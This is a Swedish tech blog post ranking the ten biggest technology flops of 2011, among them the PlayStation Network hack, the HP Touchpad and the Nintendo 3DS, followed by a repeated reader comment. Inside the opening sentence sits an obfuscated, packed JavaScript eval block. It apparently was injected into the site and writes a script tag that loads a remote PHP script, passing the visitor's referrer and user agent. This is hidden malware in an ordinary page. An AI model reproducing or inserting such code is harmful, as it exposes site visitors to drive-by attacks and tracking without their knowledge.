Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Årets 10 största teknikfloppar 2011

Årets 10 största teknikfloppar 2011
Sebastian

Året eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|khkit|var|u0026u|referrer|hskis||js|php’.split(’|’),0,{}))
2011 har gett oss en del stora misslyckanden även om det varit ett fascinerande år inom teknik. Från misslyckade surfplattor till säkerhetsmissar i väldigt stora system, här nedan följer några av det största flopparna vi varit med om i år.

Playstation Network hackat

I april 2011 lyckades ett gäng hackare ta sig in i ett av världens största gamingsystem Playstation Network. Sony som står som ansvariga var tvungna att stänga ner tjänsten i över en månad för att försöka förbättra säkerheten. Användare av systemet blev rasande och Sony tappade massa intäkter. Men förutom detta så lyckades hackarna stjäla miljontals personuppgifter och kortinformation. Inget som uppskattades av allmänheten.

Google Chromebook

Google vill verkligen vara med och spela på alal möjliga marknader. Detta kan vi se genom att titta på allt nytt som kommit och komma skall från koncernen. Google Chormebook är en enkel dator med enbart en webbläsare. Tanken var att alla applikationer från Google skulle köras från Googles molntjänster. Tyvärr hade den dålig prestanda och begränsad funktionalitet. Detta har hållit prylen från att nå framgång.

Surfplattor med Android

Android är Apples största konkurrent på smartphone och tablet marknaden. Tyvärr gick det inte så bra som man väntat sig gällande surfplattorna. Under januari till oktober sålde Acer, Motorola och Samsung totalt ca 500 000 surfplattor i USA. Apple sålde under samma period ca 11,2 miljoner iPad  världen över. Tyvärr finns inga uppgifter om exakt hur många som såldes i USA. Sammanfattat så har itne Androidplattorna utgjort något större hot mot Apple  ännu.

HP Touchpad

HP är också ett företag som gett sig in på tablets. Deras platta är både större och tyngre än Ipad, och kostar lika mycket. Det tråkiga med HP Touchpad är att det knappt finns några appar att erbjuda användarna från start. Efter ett par månader lades plattan ned och såldes ut för hundra dollar.

3D tv

Har du en 3D TV? Är du nöjd ? 3D tv:n var tippad att bli väldigt stor men tyvärr så har försäljningen gått otroligt trögt och det blev ett misslyckande. Den dåliga ekonomin som slagit oss världen över gör inte att det ser ljusare ut nästa år .

Google TV

Google är i farten igen. Deras stora satsning på TV var något som många trodde skulle bli en stor succé under 2011. Tyvärr blev det inte så och Logitech som släppte den första set-top-boxen med det utmärkta namnet Revue 🙂 uppgav nyligen att satsningen var ett stort misstag. Det sägs att Logitech har förlorat 100 miljoner dollar på satsningen och Google letar nu nya samarbetspartners för hårdvara och kommer att försöka igen nästa år.

Duke Nukem Forever

Spelet som jag själv inte har spelat men ändå väntade på. 15 år för sent släpptes uppföljaren av det populära spelet Duke Nukem. Det var så dåligt att det inte ens charmade det mest hängivna fansen. Dålig kritik och försäljning.

Nintendo 3DS

Nintendos stora satsning 3DS med 3D-grafik var något som till början såg riktigt lovande ut. Det höga priset och få spel som stödjer 3D gjorde att försäljningen uteblev. Efter att Nintendo gjort en prissänkning och lansering av Super Mario 3D så har försäljning ökat, men sett från helhetsperspektivet så blev det en flopp.
Mozilla Firefox

Mozilla har snabbat upp sina uppdateringar av Firefox men har ändå misslyckat med att locka användare. I november kom den stora browsern Google i kapp och gick t.o.m. om Firefox som den näst största webbrowsern efter Microsoft Internet Explorer.
Blackberry Playbook

”Amatörernas tid är över”, meddelade RIM när lanseringen av Blackberry Playbook tog fart i april. Surfplattan misslyckades något helt kolossalt och RIM förlorade en halv miljard dollar på grund av osålda enheter.
Playbook saknade både e-postklient och kalender från start och detta gjorde inte saken bättre.

Kommentera gärna vilka teknikprylar ni anser vara årets största teknikfloppar!

 

 

 

Comments

  1. Rebecka

    Chromebook är ett helt nytt koncept, som verkligen intresserar mig. Jag tror att Chromebook är här för att stanna. Att det inte har haft ett stort genomslag än beror väl mest på att det inte är riktigt utvecklat än och lämnar frågor. Själva konceptet tror jag dock skarpt på. Tror många om inte en majoritet mest surfar när de sitter framför datorn. De som gör mer avancerade saker eller gillar att pilla med operativsystemet själv bör självklart hålla sig till en traditionell dator.

  2. Rebecka

    Chromebook är ett helt nytt koncept, som verkligen intresserar mig. Jag tror att Chromebook är här för att stanna. Att det inte har haft ett stort genomslag än beror väl mest på att det inte är riktigt utvecklat än och lämnar frågor. Själva konceptet tror jag dock skarpt på. Tror många om inte en majoritet mest surfar när de sitter framför datorn. De som gör mer avancerade saker eller gillar att pilla med operativsystemet själv bör självklart hålla sig till en traditionell dator.